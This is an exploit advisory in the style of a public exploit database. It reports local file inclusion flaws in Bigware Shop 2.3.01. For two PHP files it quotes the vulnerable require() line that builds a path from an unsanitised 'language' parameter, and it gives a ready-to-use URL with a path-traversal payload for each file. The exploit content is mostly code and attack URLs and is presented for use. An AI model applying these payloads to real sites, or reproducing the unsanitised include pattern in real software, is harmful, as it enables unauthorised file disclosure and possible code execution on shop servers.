[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title : Bigware Shop Multiple LFI Vulnerabilities [+] [+] Exploit Author : 4TT4CK3R [+] [+] Version : 2.3.01 [+] [+] Tested on : Kali linux , Windows , FireFox [+] [+] Date : 2015/12/23 [+] [+] Category : WebApplication [+] [+] HomePage : http://www.bigware.de [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] File main_bigware_12.php : [+] /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php [+] require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php'); [+] [+] Target : http://site.com/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../YourFile.php [+] [+] =========================================================================== [+] [+] File main_bigware_115.php : [+] /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php [+] require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php'); [+] [+] Target : http://site.com/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../YourFile.php [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Discovered and Exploited by : 4TT4CK3R [+] Registered for : CyberPolice [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]